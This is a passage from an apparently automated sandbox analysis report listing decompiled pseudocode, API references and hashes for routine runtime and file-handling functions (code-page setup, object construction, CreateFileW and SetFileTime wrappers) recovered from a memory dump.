									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0x29d820; // 0x8040201
										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t80[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t80 =  &(_t80[2]);
								__eflags =  *_t80;
								if( *_t80 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t96 + 4) = _t76;
					 *(_t96 + 8) = 1;
					 *(_t96 + 0x21c) = E0028A408(_t76);
					_t81 = _t96 + 0xc;
					_t89 = _v36 + 0x29d82c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t81 = _t58;
						_t81 = _t81 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E0028A4B9(_t96);
					_t60 = 0;
				}
				L39:
				return E0027E203(_t60, _v8 ^ _t97);
			}

0x0028a87b
0x0028a882
0x0028a88a
0x0028a892
0x0028a897
0x0028a8a8
0x0028a8a8
0x0028a8aa
0x0028a8ac
0x0028a8ae
0x0028a8b1
0x0028a8b1
0x0028a8b7
0x00000000
0x00000000
0x0028a8bd
0x0028a8be
0x0028a8c1
0x0028a8c4
0x0028a8c9
0x00000000
0x0028a8cb
0x0028a8cb
0x0028a8d1
0x0028a99f
0x0028a99f
0x0028a8d7
0x0028a8d7
0x0028a8dd
0x00000000
0x0028a8e3
0x0028a8e7
0x0028a8ed
0x0028a8ef
0x00000000
0x0028a8f5
0x0028a8fa
0x0028a900
0x0028a902
0x0028a98c
0x0028a992
0x00000000
0x0028a994
0x0028a995
0x00000000
0x0028a995
0x0028a908
0x0028a912
0x0028a917
0x0028a91f
0x0028a925
0x0028a926
0x0028a929
0x0028a97c
0x0028a92b
0x0028a92b
0x0028a92f
0x0028a932
0x0028a934
0x0028a934
0x0028a937
0x0028a939
0x00000000
0x00000000
0x0028a93b
0x0028a93e
0x0028a949
0x0028a949
0x0028a94b
0x00000000
0x00000000
0x0028a943
0x0028a948
0x0028a948
0x0028a948
0x0028a94d
0x0028a950
0x0028a953
0x00000000
0x00000000
0x00000000
0x0028a953
0x0028a934
0x0028a955
0x0028a955
0x0028a958
0x0028a95d
0x0028a95d
0x0028a960
0x0028a961
0x0028a961
0x0028a961
0x0028a971
0x0028a977
0x0028a977
0x0028a981
0x0028a984
0x0028a985
0x0028a986
0x0028aa4a
0x0028aa4b
0x0028aa50
0x0028aa51
0x0028aa51
0x0028aa51
0x0028a902
0x0028a8ef
0x0028a8dd
0x0028a8d1
0x00000000
0x0028aa53
0x0028a9b1
0x0028a9b9
0x0028a9b9
0x0028a9bd
0x0028a9c0
0x0028a9c6
0x0028a9c9
0x0028a9c9
0x0028a9cc
0x0028a9ce
0x0028a9d0
0x0028a9d0
0x0028a9d3
0x0028a9d5
0x00000000
0x00000000
0x0028a9d7
0x0028a9da
0x0028a9f6
0x0028a9f6
0x0028a9f8
0x00000000
0x00000000
0x0028a9df
0x0028a9e5
0x0028a9e7
0x0028a9ed
0x0028a9f1
0x0028a9f1
0x0028a9f2
0x00000000
0x0028a9f2
0x00000000
0x0028a9e5
0x0028a9fa
0x0028a9fd
0x0028aa00
0x00000000
0x00000000
0x00000000
0x0028aa00
0x0028aa02
0x0028aa02
0x0028aa05
0x0028aa06
0x0028aa09
0x0028aa0c
0x0028aa0c
0x0028aa12
0x0028aa15
0x0028aa24
0x0028aa2d
0x0028aa32
0x0028aa38
0x0028aa39
0x0028aa39
0x0028aa3c
0x0028aa3f
0x0028aa42
0x0028aa45
0x0028aa45
0x0028aa45
0x00000000
0x0028a899
0x0028a89a
0x0028a8a0
0x0028a8a0
0x0028aa54
0x0028aa63

APIs

Part of subcall function 0028A446: GetOEMCP.KERNEL32(00000000,?,?,0028A6CF,?), ref: 0028A471

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0028A714,?,00000000), ref: 0028A8E7
GetCPInfo.KERNEL32(00000000,0028A714,?,?,?,0028A714,?,00000000), ref: 0028A8FA

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: c772fea74ca6c11224a9827e5df390fbbe2427db62b9d6ee5bb34282a91d0793
Instruction ID: 44854d832e93db407c1ee0cc6867c71007365250cd08d74755510c66344e6898
Opcode Fuzzy Hash: c772fea74ca6c11224a9827e5df390fbbe2427db62b9d6ee5bb34282a91d0793
Instruction Fuzzy Hash: DF5177789262069FFB24EF31C4456BBBBF5AF00300F14806FD086871C2DA789956CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00261382, Relevance: 3.1, APIs: 2, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00261382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0027D870(_t56, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E0026943C(_t78);
				 *_t89 = 0x2922e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00265E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0026C4CA(_t89 + 0x20e8, _t86, _t96); // executed
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0026151B();
				_t62 = E0026151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0027D82C(_t86, _t89, _t98, 0x82e8); // executed
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0026AD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0027E920(_t87, _t89 + 0x2208, 0, 0x40);
				E0027E920(_t87, _t89 + 0x2248, 0, 0x34);
				E0027E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00261382
0x00261382
0x00261382
0x00261382
0x00261382
0x00261387
0x0026138a
0x0026138c
0x0026138f
0x00261396
0x002613a2
0x002613a5
0x002613b0
0x002613b4
0x002613bf
0x002613c5
0x002613cb
0x002613d6
0x002613de
0x002613e2
0x002613e5
0x002613eb
0x002613f1
0x002613f3
0x00261418
0x002613f5
0x002613fa
0x00261400
0x00261403
0x00261409
0x00261414
0x0026140b
0x0026140d
0x0026140d
0x00261409
0x0026141b
0x00261427
0x0026142e
0x00261435
0x0026143e
0x00261449
0x00261453
0x00261459
0x0026145f
0x00261465
0x0026146b
0x00261471
0x00261477
0x0026147e
0x00261484
0x0026148a
0x00261490
0x00261496
0x0026149c
0x002614ab
0x002614ba
0x002614c5
0x002614cd
0x002614d3
0x002614d9
0x002614df
0x002614e5
0x002614eb
0x002614f1
0x002614fa
0x00261500
0x00261506
0x0026150e
0x00261518

APIs

__EH_prolog.LIBCMT ref: 00261382

Part of subcall function 00265E99: __EH_prolog.LIBCMT ref: 00265E9E

Part of subcall function 0026C4CA: __EH_prolog.LIBCMT ref: 0026C4CF
Part of subcall function 0026C4CA: new.LIBCMT ref: 0026C512
Part of subcall function 0026C4CA: new.LIBCMT ref: 0026C536

new.LIBCMT ref: 002613FA

Part of subcall function 0026AD1B: __EH_prolog.LIBCMT ref: 0026AD20

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f7c6bf6c002eab5ed0c0d0ed0185abfb7e37f22e2ffbe0b0fc910862793c71f1
Instruction ID: 4159bc5605f1deeedb7cf9831be876a2937d0e0f048f4b82c2fa6d71043ab1ed
Opcode Fuzzy Hash: f7c6bf6c002eab5ed0c0d0ed0185abfb7e37f22e2ffbe0b0fc910862793c71f1
Instruction Fuzzy Hash: 564115B0915B40DED724DF7984859E6FAE5FF18300F54896ED5EE83282CB3265A4CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0026137D, Relevance: 3.1, APIs: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0026137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0027D870(E00291157, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E0026943C(_t78);
				 *_t89 = 0x2922e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00265E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0026C4CA(_t89 + 0x20e8, _t86, _t96); // executed
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0026151B();
				_t62 = E0026151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0027D82C(_t86, _t89, _t98, 0x82e8); // executed
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0026AD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0027E920(_t87, _t89 + 0x2208, 0, 0x40);
				E0027E920(_t87, _t89 + 0x2248, 0, 0x34);
				E0027E920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x0026137d
0x0026137d
0x0026137d
0x0026137d
0x00261382
0x00261387
0x0026138a
0x0026138c
0x0026138f
0x00261396
0x002613a2
0x002613a5
0x002613b0
0x002613b4
0x002613bf
0x002613c5
0x002613cb
0x002613d6
0x002613de
0x002613e2
0x002613e5
0x002613eb
0x002613f1
0x002613f3
0x00261418
0x002613f5
0x002613fa
0x00261400
0x00261403
0x00261409
0x00261414
0x0026140b
0x0026140d
0x0026140d
0x00261409
0x0026141b
0x00261427
0x0026142e
0x00261435
0x0026143e
0x00261449
0x00261453
0x00261459
0x0026145f
0x00261465
0x0026146b
0x00261471
0x00261477
0x0026147e
0x00261484
0x0026148a
0x00261490
0x00261496
0x0026149c
0x002614ab
0x002614ba
0x002614c5
0x002614cd
0x002614d3
0x002614d9
0x002614df
0x002614e5
0x002614eb
0x002614f1
0x002614fa
0x00261500
0x00261506
0x0026150e
0x00261518

APIs

__EH_prolog.LIBCMT ref: 00261382

Part of subcall function 00265E99: __EH_prolog.LIBCMT ref: 00265E9E

Part of subcall function 0026C4CA: __EH_prolog.LIBCMT ref: 0026C4CF
Part of subcall function 0026C4CA: new.LIBCMT ref: 0026C512
Part of subcall function 0026C4CA: new.LIBCMT ref: 0026C536

new.LIBCMT ref: 002613FA

Part of subcall function 0026AD1B: __EH_prolog.LIBCMT ref: 0026AD20

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8b1f103da7206029b99057673dc3928ece45283711f7938b605c34e77906fae8
Instruction ID: b2a2e4690ddc1232f143a9e342810aac90e8c855d49afeb09370693925527dcd
Opcode Fuzzy Hash: 8b1f103da7206029b99057673dc3928ece45283711f7938b605c34e77906fae8
Instruction Fuzzy Hash: B24117B0815B40DEDB24DF7984859E7FAE5FF18300F54496ED5EE83282CB326564CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0028A6B2, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0028A6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00288516(__ebx, __ecx, __edx);
				E0028A7D1(__ebx, __ecx, __edx, _t81);
				_t31 = E0028A446(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00287A8A(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E0028A873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00287847();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x29db20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x29db20) {
								E00287A50( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x29dda0 & 0x00000001;
							if(( *0x29dda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E0028A31C(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x29dd40; // 0x35c830
									 *0x29d814 = _t44;
								}
							}
						}
						L6:
						E00287A50(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00287ECC())) = 0x16;
						goto L5;
					}
				}
			}

0x0028a6b2
0x0028a6bf
0x0028a6c2
0x0028a6ca
0x0028a6d3
0x0028a6d6
0x0028a6dc
0x00000000
0x0028a6de
0x0028a6e2
0x0028a6ef
0x0028a6f1
0x0028a6f5
0x0028a6f7
0x0028a727
0x0028a727
0x00000000
0x0028a6f9
0x0028a706
0x0028a70c
0x0028a70f
0x0028a714
0x0028a718
0x0028a71a
0x0028a739
0x0028a73d
0x0028a73f
0x0028a73f
0x0028a74a
0x0028a74e
0x0028a74f
0x0028a751
0x0028a754
0x0028a75b
0x0028a760
0x0028a765
0x0028a75b
0x0028a766
0x0028a76c
0x0028a771
0x0028a773
0x0028a776
0x0028a779
0x0028a780
0x0028a782
0x0028a789
0x0028a78e
0x0028a797
0x0028a79c
0x0028a7a2
0x0028a7a4
0x0028a7a9
0x0028a7a9
0x0028a7a2
0x0028a789
0x0028a729
0x0028a72a
0x00000000
0x0028a71c
0x0028a721
0x00000000
0x0028a721
0x0028a71a

APIs

Part of subcall function 00288516: GetLastError.KERNEL32(?,002A00E0,00283394,002A00E0,?,?,00282E0F,?,?,002A00E0), ref: 0028851A
Part of subcall function 00288516: _free.LIBCMT ref: 0028854D
Part of subcall function 00288516: SetLastError.KERNEL32(00000000,?,002A00E0), ref: 0028858E
Part of subcall function 00288516: _abort.LIBCMT ref: 00288594

Part of subcall function 0028A7D1: _abort.LIBCMT ref: 0028A803
Part of subcall function 0028A7D1: _free.LIBCMT ref: 0028A837

Part of subcall function 0028A446: GetOEMCP.KERNEL32(00000000,?,?,0028A6CF,?), ref: 0028A471

_free.LIBCMT ref: 0028A72A
_free.LIBCMT ref: 0028A760

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 0f844e61a7e61c71a05eb524cabe2894fd207d21024992d8b6282a56e929cf24
Instruction ID: 8d61c23c2d76ee1730dc23bbdaa08e114f5778e326e4ffa0b56e596105b9ac4f
Opcode Fuzzy Hash: 0f844e61a7e61c71a05eb524cabe2894fd207d21024992d8b6282a56e929cf24
Instruction Fuzzy Hash: EB31C139915105AFEB10FFA8D544BADB7F4EF40320F25409AE4049B2D1EF719E60EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00269528, Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00269528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E0027D940();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E0026B927(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E0026B32C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E0026FAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}

0x0026952d
0x00269533
0x00269540
0x00269542
0x00269548
0x00269556
0x00269556
0x00269550
0x00269550
0x00269550
0x00269560
0x00269575
0x0026957e
0x00269584
0x0026958e
0x00000000
0x00269590
0x00269590
0x00269594
0x00269596
0x00269596
0x0026959c
0x0026959c
0x0026959c
0x002695a0
0x002695a0
0x002695b0
0x002695b6
0x002695b6
0x002695bd
0x002695eb
0x002695eb
0x002695fd
0x00269602
0x00269605
0x0026961e

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000), ref: 002695B0
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000), ref: 002695E5

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ce97528e920186ba9acb333e1f865c28f4e0c47879d9ce8c0b803f1b13b9b63f
Instruction ID: 78d9c53247b4397e5391a1fe5a22aaa667ee811763037d444564b55f710b9875
Opcode Fuzzy Hash: ce97528e920186ba9acb333e1f865c28f4e0c47879d9ce8c0b803f1b13b9b63f
Instruction Fuzzy Hash: 702123B1424349AFE7318F14C885BA777ECEB49364F40492DF5DA821D1C774ACD88A60

Uniqueness

Uniqueness Score: -1.00%

Function 00269A7E, Relevance: 3.1, APIs: 2, Instructions: 82
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00269A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_a4 = 0;
				} else {
					_a4 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E0027082F(_t51, _t57,  &_v24);
				}
				if(_a4 != 0) {
					E0027082F(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E0027082F(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}

0x00269a7e
0x00269a84
0x00269a8d
0x00269a98
0x00269a98
0x00269a9e
0x00269aa4
0x00269aa7
0x00269ab4
0x00269ab0
0x00269ab0
0x00269ab0
0x00269ab6
0x00269ab7
0x00269abb
0x00269ac1
0x00269ace
0x00269ace
0x00269ac3
0x00269ac8
0x00269acc
0x00000000
0x00000000
0x00269acc
0x00269ad3
0x00269ad9
0x00269ae3
0x00269ae3
0x00269ae7
0x00269aee
0x00269aee
0x00269af8
0x00269b01
0x00269b01
0x00269b09
0x00269b12
0x00269b12
0x00269b22
0x00269b30
0x00269b40
0x00269b48
0x00269b54

APIs

FlushFileBuffers.KERNEL32(?), ref: 00269A98
SetFileTime.KERNELBASE(?,?,?,?), ref: 00269B48

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
